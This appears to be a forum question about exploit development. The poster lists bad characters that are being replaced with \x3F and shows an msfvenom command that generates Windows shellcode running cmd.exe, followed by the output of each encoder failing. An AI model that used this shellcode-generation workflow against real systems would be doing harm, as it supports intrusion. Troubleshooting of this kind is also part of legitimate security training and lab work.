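I ran into problems when looking for bad characters, because hex codes were replaced with \x3F and some other codes.
Here I have all 256 hex characters from \x01 to \xFF, and as you can see, many of them are replaced by \x3F and other characters, so I cannot figure out the bad characters.
I tried to work out the bad characters and the replaced characters; they are: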
\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x95\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xa4\xa6\xa8\xb4\xb8\xbc\xbd\xbe
Then I used msfvenom to generate shellcode, but got the result below.
$msfvenom -a x86 --platform windows -p windows/exec cmd=cmd.exe -b '\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x95\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xa4\xa6\xa8\xb4\xb8\xbc\xbd\xbe' -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor failed with A valid encoding key could not be found.
Attempting to encode payload with 1 iterations of x86/countdown
x86/countdown failed with Encoding failed due to a bad character (index=84, char=0x0d)
Attempting to encode payload with 1 iterations of x86/fnstenv_mov
x86/fnstenv_mov failed with A valid encoding key could not be found.
Attempting to encode payload with 1 iterations of x86/jmp_call_additive
x86/jmp_call_additive failed with Encoding failed due to a bad character (index=15, char=0x85)
Attempting to encode payload with 1 iterations of x86/xor_dynamic
Error: Bad character found in stub for the Dynamic key XOR Encoder encoder.
